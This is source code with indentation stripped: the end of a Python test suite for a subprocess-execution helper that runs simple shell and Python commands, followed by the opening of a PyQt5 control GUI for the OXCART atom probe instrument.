if verbose: print(result.stdout_lines)
assert [s.strip() for s in result.stdout_lines] == ["3"]
#
if (os.name == "nt"):
result = fb(command="dir").raise_if_errors()
if verbose: print(result.stdout_lines)
assert len(result.stdout_lines) > 0
windir = os.environ.get("windir", None)
if (windir is not None and windir.find(" ") < 0):
result = fb(command="dir "+windir).raise_if_errors()
if verbose: print(result.stdout_lines)
assert len(result.stdout_lines) > 0
#
pyexe = sys.executable
assert pyexe.count('"') == 0
pyexe = '"' + pyexe + '"'
if (os.name == "nt"):
pyexe = "call " + pyexe
#
if ("PYTHONPATH" in os.environ):
if (not hasattr(os, "unsetenv")):
os.environ["PYTHONPATH"] = ""
else:
del os.environ["PYTHONPATH"]
if (os.name == "nt"):
result = fb(command="set").raise_if_errors()
elif (os.path.isfile("/usr/bin/printenv")):
result = fb(command="/usr/bin/printenv").raise_if_errors()
else:
result = None
if (result is not None):
if verbose: print(result.stdout_lines)
for line in result.stdout_lines:
assert not line.startswith("PYTHONPATH") or line == "PYTHONPATH="
#
for stdout_splitlines in [True, False]:
result = fb(
command="%s -V" % pyexe,
stdout_splitlines=stdout_splitlines)
# python -V outputs to stdout or stderr depending on version
# https://bugs.python.org/issue18338
if (len(result.stderr_lines) > 0):
if verbose: print(result.stderr_lines)
assert result.stderr_lines[0].startswith(
"Python " + sys.version.split()[0])
if (stdout_splitlines):
assert result.stdout_buffer is None
assert result.stdout_lines == []
else:
assert result.stdout_buffer == ""
assert result.stdout_lines is None
else:
if verbose: print(result.stdout_lines)
if (stdout_splitlines):
assert result.stdout_buffer is None
assert result.stdout_lines[0].startswith(
"Python " + sys.version.split()[0])
else:
assert result.stdout_buffer.startswith(
"Python " + sys.version.split()[0])
assert result.stdout_lines is None
result = go(command="%s -V" % pyexe)
if verbose: print(result.stdout_lines)
assert result.stdout_lines[0].startswith("Python " + sys.version.split()[0])
result = fb(
command='%s -c "print(3+4)"' % pyexe).raise_if_errors()
if verbose: print(result.stdout_lines)
assert result.stdout_lines == ["7"]
command = command = pyexe \
+ ' -c "import sys; print(len(list(filter(bool, sys.stdin.read().splitlines()))))"'
result = fb(command=command).raise_if_errors()
if verbose: print(result.stdout_lines)
assert result.stdout_lines == ["0"]
result = fb(command=command, stdin_lines=["hello"]) \
.raise_if_errors()
if verbose: print(result.stdout_lines)
assert result.stdout_lines == ["1"]
result = fb(command=command, stdin_lines=["hello", "world"]) \
.raise_if_errors()
if verbose: print(result.stdout_lines)
assert result.stdout_lines == ["2"]
result = fb(command=command, stdin_lines="hello\nworld\nbye\n") \
.raise_if_errors()
if verbose: print(result.stdout_lines)
assert result.stdout_lines == ["3"]
if ("--quick" in args):
n_lines_o = 10000
else:
n_lines_o = 1000000
if (fb is fully_buffered_simple):
n_lines_e = 500 # Windows blocks if this value is greater than 701
else:
n_lines_e = 10000
result = fb(
command=command, stdin_lines=[str(i) for i in range(n_lines_o)]) \
.raise_if_errors()
if verbose: print(result.stdout_lines)
assert result.stdout_lines == [str(n_lines_o)]
command = pyexe \
+ ' -c "import sys; sys.stderr.write(sys.stdin.read())"'
result = fb(command=command, stdin_lines="Hello\nWorld\nBye\n") \
.raise_if_output()
s = StringIO()
result.show_stderr(out=s, prefix="%(")
if verbose: sys.stdout.write(s.getvalue())
assert s.getvalue() == """\
%(Hello
%(World
%(Bye
"""
cat_command = command = pyexe \
+ ' -c "import sys; sys.stdout.write(sys.stdin.read())"'
result = fb(command=command, stdin_lines="hello\nworld\nbye\n") \
.raise_if_errors()
s = StringIO()
result.show_stdout(out=s, prefix=">:")
if verbose: sys.stdout.write(s.getvalue())
assert s.getvalue() == """\
>:hello
>:world
>:bye
"""
result = fb(
command=command, stdin_lines=[str(i) for i in range(n_lines_o)]) \
.raise_if_errors()
result.stdout_lines = list(filter(bool, result.stdout_lines))
if verbose: print(result.stdout_lines[:5], result.stdout_lines[-5:])
assert len(result.stdout_lines) == n_lines_o
assert result.stdout_lines[:5] == ["0","1","2","3","4"]
assert result.stdout_lines[-5:] == [str(s)
for s in range(n_lines_o-5, n_lines_o)]
command = pyexe \
+ ' -c "import sys; sys.stderr.write(sys.stdin.read())"'
result = fb(
command=command, stdin_lines=[str(i) for i in range(n_lines_e,0,-1)])
assert len(result.stdout_lines) == 0
result.stderr_lines = list(filter(bool, result.stderr_lines))
if verbose: print(result.stderr_lines[:5], result.stderr_lines[-5:])
assert len(result.stderr_lines) == n_lines_e
assert result.stderr_lines[:5] == [str(s)
for s in range(n_lines_e, n_lines_e-5, -1)]
assert result.stderr_lines[-5:] == ["5","4","3","2","1"]
command = pyexe + "; ".join((''' -c "\
import sys, os
lines = sys.stdin.read()
sys.stdout.write(lines)
sys.stdout.flush()
lines = list(filter(bool, lines.splitlines()))[:%d]
lines.reverse()
nl = chr(%d)
sys.stderr.write(nl.join(lines)+nl)
sys.stderr.flush()"''' % (n_lines_e, ord("\n"))).splitlines())
result = fb(
command=command, stdin_lines=[str(i) for i in range(n_lines_o)])
result.stdout_lines = list(filter(bool, result.stdout_lines))
result.stderr_lines = list(filter(bool, result.stderr_lines))
if verbose: print(result.stdout_lines[:5], result.stdout_lines[-5:])
if verbose: print(result.stderr_lines[:5], result.stderr_lines[-5:])
assert len(result.stdout_lines) == n_lines_o
assert result.stdout_lines[:5] == ["0","1","2","3","4"]
assert result.stdout_lines[-5:] == [str(s)
for s in range(n_lines_o-5, n_lines_o)]
assert len(result.stderr_lines) == n_lines_e
assert result.stderr_lines[:5] == [str(s)
for s in range(n_lines_e-1, n_lines_e-6, -1)]
assert result.stderr_lines[-5:] == ["4","3","2","1","0"]
result = go(
command=command, stdin_lines=[str(i) for i in range(n_lines_o)])
result.stdout_lines = list(filter(bool, result.stdout_lines))
if verbose: print(result.stdout_lines[:5], result.stdout_lines[-5:])
assert len(result.stdout_lines) == n_lines_o + n_lines_e
assert result.stdout_lines[:5] == ["0","1","2","3","4"]
assert result.stdout_lines[-5:] == ["4","3","2","1","0"]
#
try: fb(command="C68649356116218352").raise_if_errors()
except RuntimeError as e:
if verbose: print(e)
# Just check for RuntimeError; there are now additional
# specific error messages.
pass
# assert str(e).startswith("child process stderr output:\n")
else: raise Exception_expected
#
for stdout_splitlines in [True, False]:
for n,b in [(10,20),(11,23),(12,26),(13,29)]:
try:
fb(
command=cat_command,
stdin_lines=[str(i) for i in range(n)],
stdout_splitlines=stdout_splitlines).raise_if_output()
except RuntimeError as e:
if verbose: print(e)
assert str(e).startswith("unexpected child process output:\n")
if (stdout_splitlines):
if (n != 13):
assert str(e).endswith(str(n-1))
else:
assert str(e).endswith(" remaining 3 lines omitted.")
else:
assert str(e).endswith(" length of output: %d bytes" % b)
else: raise Exception_expected
#
fb(command=cat_command).raise_if_errors_or_output()
#
result = fb(command=["nslookup", "localhost"])
if verbose:
print(result.stdout_lines)
print(result.stderr_lines)
#
while ("--forever" in args): pass
#
print("OK")
if (__name__ == "__main__"):
exercise()
|
gui.py
|
"""
This is the main script of main GUI of the OXCART Atom Probe.
@author: Mehrpad Monajem <mehrpad.monajem@fau.de>
"""
import sys
import numpy as np
import nidaqmx
import time
import threading
import datetime
import os
# PyQt and PyQtgraph libraries
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtCore import QThread, pyqtSignal
from PyQt5.QtWidgets import QApplication
from PyQt5.QtGui import QScreen, QPixmap, QImage
import pyqtgraph as pg
import pyqtgraph.exporters
# Serial ports and Camera libraries
import serial.tools.list_ports
from pypylon import pylon
# Local project scripts
import oxcart
import variables
from devices.camera import Camera
from devices import initialize_devices
class Ui_OXCART(Camera, object):
"""
The GUI class of the Oxcart
"""
def __init__(self, devices, tlFactory, cameras, converter, lock):
super().__init__(devices, tlFactory, cameras, converter) # Cameras variables and converter
self.lock = lock # Lock for thread ...
def setupUi(self, OXCART):
OXCART.setObjectName("OXCART")
OXCART.resize(3400, 1800)
self.centralwidget = QtWidgets.QWidget(OXCART)
self.centralwidget.setObjectName("centralwidget")
# self.vdc_time = QtWidgets.QWidget(self.centralwidget)
self.vdc_time = pg.PlotWidget(self.centralwidget)
self.vdc_time.setGeometry(QtCore.QRect(530, 260, 500, 500))
self.vdc_time.setObjectName("vdc_time")
self.label_7 = QtWidgets.QLabel(self.centralwidget)
self.label_7.setGeometry(QtCore.QRect(730, 210, 80, 25))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_7.setFont(font)
self.label_7.setObjectName("label_7")
self.layoutWidget = QtWidgets.QWidget(self.centralwidget)
self.layoutWidget.setGeometry(QtCore.QRect(3030, 1520, 314, 106))
self.layoutWidget.setObjectName("layoutWidget")
self.gridLayout_2 = QtWidgets.QGridLayout(self.layoutWidget)
self.gridLayout_2.setContentsMargins(0, 0, 0, 0)
self.gridLayout_2.setObjectName("gridLayout_2")
self.start_button = QtWidgets.QPushButton(self.layoutWidget)
self.start_button.setObjectName("start_button")
self.gridLayout_2.addWidget(self.start_button, 1, 0, 1, 1)
self.stop_button = QtWidgets.QPushButton(self.layoutWidget)
self.stop_button.setObjectName("stop_button")
self.gridLayout_2.addWidget(self.stop_button, 2, 0, 1, 1)
self.label_10 = QtWidgets.QLabel(self.centralwidget)
self.label_10.setGeometry(QtCore.QRect(1230, 210, 156, 25))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_10.setFont(font)
self.label_10.setObjectName("label_10")
# self.detection_rate_viz = QtWidgets.QWidget(self.centralwidget)
self.detection_rate_viz = pg.PlotWidget(self.centralwidget)
self.detection_rate_viz.setGeometry(QtCore.QRect(1080, 260, 500, 500))
self.detection_rate_viz.setObjectName("detection_rate_viz")
self.label_19 = QtWidgets.QLabel(self.centralwidget)
self.label_19.setGeometry(QtCore.QRect(710, 830, 134, 25))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_19.setFont(font)
self.label_19.setObjectName("label_19")
###
# self.visualization = QtWidgets.QWidget(self.centralwidget)
self.visualization = pg.PlotWidget(self.centralwidget)
self.visualization.setGeometry(QtCore.QRect(530, 870, 500, 500))
self.visualization.setObjectName("visualization")
self.detector_circle = pg.QtGui.QGraphicsEllipseItem(0, 0, 2400, 2400) # x, y, width, height
self.detector_circle.setPen(pg.mkPen(color=(255, 0, 0), width=1))
self.visualization.addItem(self.detector_circle)
###
self.label_24 = QtWidgets.QLabel(self.centralwidget)
self.label_24.setGeometry(QtCore.QRect(1280, 820, 51, 25))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_24.setFont(font)
self.label_24.setObjectName("label_24")
# self.temperature = QtWidgets.QWidget(self.centralwidget)
self.temperature = pg.PlotWidget(self.centralwidget)
self.temperature.setGeometry(QtCore.QRect(2530, 1400, 411, 311))
self.temperature.setObjectName("temperature")
self.label_18 = QtWidgets.QLabel(self.centralwidget)
self.label_18.setGeometry(QtCore.QRect(10, 1150, 101, 41))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_18.setFont(font)
self.label_18.setObjectName("label_18")
self.Error = QtWidgets.QLabel(self.centralwidget)
self.Error.setGeometry(QtCore.QRect(530, 1400, 1241, 51))
font = QtGui.QFont()
font.setPointSize(13)
font.setBold(True)
font.setWeight(75)
font.setStrikeOut(False)
self.Error.setFont(font)
self.Error.setAlignment(QtCore.Qt.AlignCenter)
self.Error.setTextInteractionFlags(QtCore.Qt.LinksAccessibleByMouse)
self.Error.setObjectName("Error")
self.diagram = QtWidgets.QLabel(self.centralwidget)
self.diagram.setGeometry(QtCore.QRect(10, 1190, 481, 371))
self.diagram.setText("")
self.diagram.setObjectName("diagram")
self.label_29 = QtWidgets.QLabel(self.centralwidget)
self.label_29.setGeometry(QtCore.QRect(1810, 830, 110, 25))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_29.setFont(font)
self.label_29.setObjectName("label_29")
self.label_30 = QtWidgets.QLabel(self.centralwidget)
self.label_30.setGeometry(QtCore.QRect(1810, 230, 110, 25))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_30.setFont(font)
self.label_30.setObjectName("label_30")
self.label_31 = QtWidgets.QLabel(self.centralwidget)
self.label_31.setGeometry(QtCore.QRect(2700, 840, 110, 25))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_31.setFont(font)
self.label_31.setObjectName("label_31")
self.label_32 = QtWidgets.QLabel(self.centralwidget)
self.label_32.setGeometry(QtCore.QRect(2700, 220, 110, 25))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_32.setFont(font)
self.label_32.setObjectName("label_32")
self.label_33 = QtWidgets.QLabel(self.centralwidget)
self.label_33.setGeometry(QtCore.QRect(2220, 800, 171, 25))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_33.setFont(font)
self.label_33.setObjectName("label_33")
self.label_34 = QtWidgets.QLabel(self.centralwidget)
self.label_34.setGeometry(QtCore.QRect(2200, 190, 171, 25))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_34.setFont(font)
self.label_34.setObjectName("label_34")
self.light = QtWidgets.QPushButton(self.centralwidget)
self.light.setGeometry(QtCore.QRect(3120, 50, 101, 46))
self.light.setObjectName("light")
self.led_light = QtWidgets.QLabel(self.centralwidget)
self.led_light.setGeometry(QtCore.QRect(3240, 40, 111, 61))
self.led_light.setAlignment(QtCore.Qt.AlignCenter)
self.led_light.setObjectName("led_light")
self.vacuum_main = QtWidgets.QLCDNumber(self.centralwidget)
self.vacuum_main.setGeometry(QtCore.QRect(2270, 1510, 231, 91))
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.vacuum_main.setFont(font)
self.vacuum_main.setObjectName("vacuum_main")
self.vacuum_buffer = QtWidgets.QLCDNumber(self.centralwidget)
self.vacuum_buffer.setGeometry(QtCore.QRect(1780, 1500, 231, 91))
font = QtGui.QFont()
font.setPointSize(8)
self.vacuum_buffer.setFont(font)
self.vacuum_buffer.setObjectName("vacuum_buffer")
self.vacuum_load_lock = QtWidgets.QLCDNumber(self.centralwidget)
self.vacuum_load_lock.setGeometry(QtCore.QRect(1190, 1500, 231, 91))
self.vacuum_load_lock.setObjectName("vacuum_load_lock")
self.label_35 = QtWidgets.QLabel(self.centralwidget)
self.label_35.setGeometry(QtCore.QRect(2020, 1540, 241, 31))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_35.setFont(font)
self.label_35.setObjectName("label_35")
self.label_36 = QtWidgets.QLabel(self.centralwidget)
self.label_36.setGeometry(QtCore.QRect(1490, 1540, 251, 31))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_36.setFont(font)
self.label_36.setObjectName("label_36")
self.label_37 = QtWidgets.QLabel(self.centralwidget)
self.label_37.setGeometry(QtCore.QRect(980, 1540, 181, 25))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_37.setFont(font)
self.label_37.setObjectName("label_37")
self.label_38 = QtWidgets.QLabel(self.centralwidget)
self.label_38.setGeometry(QtCore.QRect(2050, 1650, 191, 25))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_38.setFont(font)
self.label_38.setObjectName("label_38")
self.temp = QtWidgets.QLCDNumber(self.centralwidget)
self.temp.setGeometry(QtCore.QRect(2270, 1620, 231, 91))
self.temp.setObjectName("temp")
####
# self.cam_s_o = QtWidgets.QLabel(self.centralwidget)
self.cam_s_o = pg.ImageView(self.centralwidget)
self.cam_s_o.adjustSize()
self.cam_s_o.ui.histogram.hide()
self.cam_s_o.ui.roiBtn.hide()
self.cam_s_o.ui.menuBtn.hide()
self.cam_s_o.setGeometry(QtCore.QRect(1630, 260, 500, 500))
# self.cam_s_o.setText("")
self.cam_s_o.setObjectName("cam_s_o")
# self.cam_b_o = QtWidgets.QLabel(self.centralwidget)
self.cam_b_o = pg.ImageView(self.centralwidget)
self.cam_b_o.adjustSize()
self.cam_b_o.ui.histogram.hide()
self.cam_b_o.ui.roiBtn.hide()
self.cam_b_o.ui.menuBtn.hide()
self.cam_b_o.setGeometry(QtCore.QRect(1630, 870, 500, 500))
# self.cam_b_o.setText("")
####
self.cam_b_o.setObjectName("cam_b_o")
self.cam_s_d = QtWidgets.QLabel(self.centralwidget)
self.cam_s_d.setGeometry(QtCore.QRect(2150, 260, 1200, 500))
self.cam_s_d.setText("")
self.cam_s_d.setObjectName("cam_s_d")
self.cam_b_d = QtWidgets.QLabel(self.centralwidget)
self.cam_b_d.setGeometry(QtCore.QRect(2150, 870, 1200, 500))
self.cam_b_d.setText("")
self.cam_b_d.setObjectName("cam_b_d")
self.layoutWidget1 = QtWidgets.QWidget(self.centralwidget)
self.layoutWidget1.setGeometry(QtCore.QRect(650, 1580, 235, 131))
self.layoutWidget1.setObjectName("layoutWidget1")
self.gridLayout_6 = QtWidgets.QGridLayout(self.layoutWidget1)
self.gridLayout_6.setContentsMargins(0, 0, 0, 0)
self.gridLayout_6.setObjectName("gridLayout_6")
self.led_pump_load_lock = QtWidgets.QLabel(self.layoutWidget1)
self.led_pump_load_lock.setAlignment(QtCore.Qt.AlignCenter)
self.led_pump_load_lock.setObjectName("led_pump_load_lock")
self.gridLayout_6.addWidget(self.led_pump_load_lock, 0, 0, 2, 1)
self.pump_load_lock_switch = QtWidgets.QPushButton(self.layoutWidget1)
self.pump_load_lock_switch.setObjectName("pump_load_lock_switch")
self.gridLayout_6.addWidget(self.pump_load_lock_switch, 2, 0, 1, 1)
# self.histogram = QtWidgets.QWidget(self.centralwidget)
self.histogram = pg.PlotWidget(self.centralwidget)
self.histogram.setGeometry(QtCore.QRect(1080, 870, 500, 500))
self.histogram.setObjectName("histogram")
self.label_40 = QtWidgets.QLabel(self.centralwidget)
self.label_40.setGeometry(QtCore.QRect(1480, 1640, 291, 31))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_40.setFont(font)
self.label_40.setObjectName("label_40")
self.vacuum_buffer_back = QtWidgets.QLCDNumber(self.centralwidget)
self.vacuum_buffer_back.setGeometry(QtCore.QRect(1780, 1610, 231, 91))
font = QtGui.QFont()
font.setPointSize(8)
self.vacuum_buffer_back.setFont(font)
self.vacuum_buffer_back.setObjectName("vacuum_buffer_back")
self.vacuum_load_lock_back = QtWidgets.QLCDNumber(self.centralwidget)
self.vacuum_load_lock_back.setGeometry(QtCore.QRect(1190, 1610, 231, 91))
self.vacuum_load_lock_back.setObjectName("vacuum_load_lock_back")
self.label_39 = QtWidgets.QLabel(self.centralwidget)
self.label_39.setGeometry(QtCore.QRect(950, 1640, 231, 25))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_39.setFont(font)
self.label_39.setObjectName("label_39")
self.layoutWidget2 = QtWidgets.QWidget(self.centralwidget)
self.layoutWidget2.setGeometry(QtCore.QRect(20, 1580, 476, 131))
self.layoutWidget2.setObjectName("layoutWidget2")
self.gridLayout = QtWidgets.QGridLayout(self.layoutWidget2)
self.gridLayout.setContentsMargins(0, 0, 0, 0)
self.gridLayout.setObjectName("gridLayout")
self.led_main_chamber = QtWidgets.QLabel(self.layoutWidget2)
self.led_main_chamber.setAlignment(QtCore.Qt.AlignCenter)
self.led_main_chamber.setObjectName("led_main_chamber")
self.gridLayout.addWidget(self.led_main_chamber, 0, 0, 1, 1)
self.led_load_lock = QtWidgets.QLabel(self.layoutWidget2)
self.led_load_lock.setAlignment(QtCore.Qt.AlignCenter)
self.led_load_lock.setObjectName("led_load_lock")
self.gridLayout.addWidget(self.led_load_lock, 0, 1, 1, 1)
self.led_cryo = QtWidgets.QLabel(self.layoutWidget2)
self.led_cryo.setAlignment(QtCore.Qt.AlignCenter)
self.led_cryo.setObjectName("led_cryo")
self.gridLayout.addWidget(self.led_cryo, 0, 2, 1, 1)
self.main_chamber_switch = QtWidgets.QPushButton(self.layoutWidget2)
self.main_chamber_switch.setObjectName("main_chamber_switch")
self.gridLayout.addWidget(self.main_chamber_switch, 1, 0, 1, 1)
self.load_lock_switch = QtWidgets.QPushButton(self.layoutWidget2)
self.load_lock_switch.setObjectName("load_lock_switch")
self.gridLayout.addWidget(self.load_lock_switch, 1, 1, 1, 1)
self.cryo_switch = QtWidgets.QPushButton(self.layoutWidget2)
self.cryo_switch.setObjectName("cryo_switch")
self.gridLayout.addWidget(self.cryo_switch, 1, 2, 1, 1)
self.textEdit = QtWidgets.QTextEdit(self.centralwidget)
self.textEdit.setGeometry(QtCore.QRect(530, 30, 2581, 140))
self.textEdit.setObjectName("textEdit")
self.layoutWidget3 = QtWidgets.QWidget(self.centralwidget)
self.layoutWidget3.setGeometry(QtCore.QRect(10, 890, 436, 242))
self.layoutWidget3.setObjectName("layoutWidget3")
self.gridLayout_4 = QtWidgets.QGridLayout(self.layoutWidget3)
self.gridLayout_4.setContentsMargins(0, 0, 0, 0)
self.gridLayout_4.setObjectName("gridLayout_4")
self.label_11 = QtWidgets.QLabel(self.layoutWidget3)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_11.setFont(font)
self.label_11.setObjectName("label_11")
self.gridLayout_4.addWidget(self.label_11, 0, 0, 1, 1)
self.label_12 = QtWidgets.QLabel(self.layoutWidget3)
self.label_12.setObjectName("label_12")
self.gridLayout_4.addWidget(self.label_12, 1, 0, 1, 1)
self.elapsed_time = QtWidgets.QLineEdit(self.layoutWidget3)
self.elapsed_time.setText("")
self.elapsed_time.setObjectName("elapsed_time")
self.gridLayout_4.addWidget(self.elapsed_time, 1, 1, 1, 1)
self.label_13 = QtWidgets.QLabel(self.layoutWidget3)
self.label_13.setObjectName("label_13")
self.gridLayout_4.addWidget(self.label_13, 2, 0, 1, 1)
self.total_ions = QtWidgets.QLineEdit(self.layoutWidget3)
self.total_ions.setText("")
self.total_ions.setObjectName("total_ions")
self.gridLayout_4.addWidget(self.total_ions, 2, 1, 1, 1)
self.label_14 = QtWidgets.QLabel(self.layoutWidget3)
self.label_14.setObjectName("label_14")
self.gridLayout_4.addWidget(self.label_14, 3, 0, 1, 1)
self.speciemen_voltage = QtWidgets.QLineEdit(self.layoutWidget3)
self.speciemen_voltage.setText("")
self.speciemen_voltage.setObjectName("speciemen_voltage")
self.gridLayout_4.addWidget(self.speciemen_voltage, 3, 1, 1, 1)
self.label_16 = QtWidgets.QLabel(self.layoutWidget3)
self.label_16.setObjectName("label_16")
self.gridLayout_4.addWidget(self.label_16, 4, 0, 1, 1)
self.pulse_voltage = QtWidgets.QLineEdit(self.layoutWidget3)
self.pulse_voltage.setText("")
self.pulse_voltage.setObjectName("pulse_voltage")
self.gridLayout_4.addWidget(self.pulse_voltage, 4, 1, 1, 1)
self.label_15 = QtWidgets.QLabel(self.layoutWidget3)
self.label_15.setObjectName("label_15")
self.gridLayout_4.addWidget(self.label_15, 5, 0, 1, 1)
self.detection_rate = QtWidgets.QLineEdit(self.layoutWidget3)
self.detection_rate.setText("")
self.detection_rate.setObjectName("detection_rate")
self.gridLayout_4.addWidget(self.detection_rate, 5, 1, 1, 1)
self.criteria_ions = QtWidgets.QCheckBox(self.centralwidget)
self.criteria_ions.setGeometry(QtCore.QRect(500, 190, 31, 29))
font = QtGui.QFont()
font.setItalic(False)
self.criteria_ions.setFont(font)
self.criteria_ions.setMouseTracking(True)
self.criteria_ions.setText("")
self.criteria_ions.setChecked(True)
self.criteria_ions.setObjectName("criteria_ions")
self.criteria_vdc = QtWidgets.QCheckBox(self.centralwidget)
self.criteria_vdc.setGeometry(QtCore.QRect(500, 320, 31, 29))
font = QtGui.QFont()
font.setItalic(False)
self.criteria_vdc.setFont(font)
self.criteria_vdc.setMouseTracking(True)
self.criteria_vdc.setText("")
self.criteria_vdc.setChecked(True)
self.criteria_vdc.setObjectName("criteria_vdc")
self.criteria_time = QtWidgets.QCheckBox(self.centralwidget)
self.criteria_time.setGeometry(QtCore.QRect(500, 150, 31, 29))
font = QtGui.QFont()
font.setItalic(False)
self.criteria_time.setFont(font)
self.criteria_time.setMouseTracking(True)
self.criteria_time.setText("")
self.criteria_time.setChecked(True)
self.criteria_time.setObjectName("criteria_time")
self.widget = QtWidgets.QWidget(self.centralwidget)
self.widget.setGeometry(QtCore.QRect(11, 16, 490, 850))
self.widget.setObjectName("widget")
self.gridLayout_3 = QtWidgets.QGridLayout(self.widget)
self.gridLayout_3.setContentsMargins(0, 0, 0, 0)
self.gridLayout_3.setObjectName("gridLayout_3")
self.label = QtWidgets.QLabel(self.widget)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label.setFont(font)
self.label.setObjectName("label")
self.gridLayout_3.addWidget(self.label, 0, 0, 1, 2)
self.parameters_source = QtWidgets.QComboBox(self.widget)
self.parameters_source.setObjectName("parameters_source")
self.parameters_source.addItem("")
self.parameters_source.addItem("")
self.gridLayout_3.addWidget(self.parameters_source, 0, 2, 1, 1)
self.label_43 = QtWidgets.QLabel(self.widget)
self.label_43.setObjectName("label_43")
self.gridLayout_3.addWidget(self.label_43, 1, 0, 1, 1)
self.ex_user = QtWidgets.QLineEdit(self.widget)
self.ex_user.setObjectName("ex_user")
self.gridLayout_3.addWidget(self.ex_user, 1, 2, 1, 1)
self.label_21 = QtWidgets.QLabel(self.widget)
self.label_21.setObjectName("label_21")
self.gridLayout_3.addWidget(self.label_21, 2, 0, 1, 1)
self.ex_name = QtWidgets.QLineEdit(self.widget)
self.ex_name.setObjectName("ex_name")
self.gridLayout_3.addWidget(self.ex_name, 2, 2, 1, 1)
self.label_2 = QtWidgets.QLabel(self.widget)
self.label_2.setObjectName("label_2")
self.gridLayout_3.addWidget(self.label_2, 3, 0, 1, 2)
self.ex_time = QtWidgets.QLineEdit(self.widget)
self.ex_time.setObjectName("ex_time")
self.gridLayout_3.addWidget(self.ex_time, 3, 2, 1, 1)
self.label_41 = QtWidgets.QLabel(self.widget)
self.label_41.setObjectName("label_41")
self.gridLayout_3.addWidget(self.label_41, 4, 0, 1, 2)
self.max_ions = QtWidgets.QLineEdit(self.widget)
self.max_ions.setObjectName("max_ions")
self.gridLayout_3.addWidget(self.max_ions, 4, 2, 1, 1)
self.label_3 = QtWidgets.QLabel(self.widget)
self.label_3.setObjectName("label_3")
self.gridLayout_3.addWidget(self.label_3, 5, 0, 1, 2)
self.ex_freq = QtWidgets.QLineEdit(self.widget)
self.ex_freq.setObjectName("ex_freq")
self.gridLayout_3.addWidget(self.ex_freq, 5, 2, 1, 1)
self.label_4 = QtWidgets.QLabel(self.widget)
self.label_4.setObjectName("label_4")
self.gridLayout_3.addWidget(self.label_4, 6, 0, 1, 2)
self.vdc_min = QtWidgets.QLineEdit(self.widget)
self.vdc_min.setObjectName("vdc_min")
self.gridLayout_3.addWidget(self.vdc_min, 6, 2, 1, 1)
self.label_5 = QtWidgets.QLabel(self.widget)
self.label_5.setObjectName("label_5")
self.gridLayout_3.addWidget(self.label_5, 7, 0, 1, 2)
self.vdc_max = QtWidgets.QLineEdit(self.widget)
self.vdc_max.setObjectName("vdc_max")
self.gridLayout_3.addWidget(self.vdc_max, 7, 2, 1, 1)
self.label_6 = QtWidgets.QLabel(self.widget)
self.label_6.setObjectName("label_6")
self.gridLayout_3.addWidget(self.label_6, 8, 0, 1, 1)
self.vdc_steps_up = QtWidgets.QLineEdit(self.widget)
self.vdc_steps_up.setObjectName("vdc_steps_up")
self.gridLayout_3.addWidget(self.vdc_steps_up, 8, 2, 1, 1)
self.label_28 = QtWidgets.QLabel(self.widget)
self.label_28.setObjectName("label_28")
self.gridLayout_3.addWidget(self.label_28, 9, 0, 1, 1)
self.vdc_steps_down = QtWidgets.QLineEdit(self.widget)
self.vdc_steps_down.setObjectName("vdc_steps_down")
self.gridLayout_3.addWidget(self.vdc_steps_down, 9, 2, 1, 1)
self.label_20 = QtWidgets.QLabel(self.widget)
self.label_20.setObjectName("label_20")
self.gridLayout_3.addWidget(self.label_20, 10, 0, 1, 2)
self.cycle_avg = QtWidgets.QLineEdit(self.widget)
self.cycle_avg.setObjectName("cycle_avg")
self.gridLayout_3.addWidget(self.cycle_avg, 10, 2, 1, 1)
self.label_8 = QtWidgets.QLabel(self.widget)
self.label_8.setObjectName("label_8")
self.gridLayout_3.addWidget(self.label_8, 11, 0, 1, 2)
self.vp_min = QtWidgets.QLineEdit(self.widget)
self.vp_min.setObjectName("vp_min")
self.gridLayout_3.addWidget(self.vp_min, 11, 2, 1, 1)
self.label_9 = QtWidgets.QLabel(self.widget)
self.label_9.setObjectName("label_9")
self.gridLayout_3.addWidget(self.label_9, 12, 0, 1, 2)
self.vp_max = QtWidgets.QLineEdit(self.widget)
self.vp_max.setObjectName("vp_max")
self.gridLayout_3.addWidget(self.vp_max, 12, 2, 1, 1)
self.label_25 = QtWidgets.QLabel(self.widget)
self.label_25.setObjectName("label_25")
self.gridLayout_3.addWidget(self.label_25, 13, 0, 1, 2)
self.pulse_fraction = QtWidgets.QLineEdit(self.widget)
self.pulse_fraction.setObjectName("pulse_fraction")
self.gridLayout_3.addWidget(self.pulse_fraction, 13, 2, 1, 1)
self.label_23 = QtWidgets.QLabel(self.widget)
self.label_23.setObjectName("label_23")
self.gridLayout_3.addWidget(self.label_23, 14, 0, 1, 2)
self.pulse_frequency = QtWidgets.QLineEdit(self.widget)
self.pulse_frequency.setObjectName("pulse_frequency")
self.gridLayout_3.addWidget(self.pulse_frequency, 14, 2, 1, 1)
self.label_17 = QtWidgets.QLabel(self.widget)
self.label_17.setObjectName("label_17")
self.gridLayout_3.addWidget(self.label_17, 15, 0, 1, 2)
self.detection_rate_init = QtWidgets.QLineEdit(self.widget)
self.detection_rate_init.setObjectName("detection_rate_init")
self.gridLayout_3.addWidget(self.detection_rate_init, 15, 2, 1, 1)
self.label_22 = QtWidgets.QLabel(self.widget)
self.label_22.setObjectName("label_22")
self.gridLayout_3.addWidget(self.label_22, 16, 0, 1, 1)
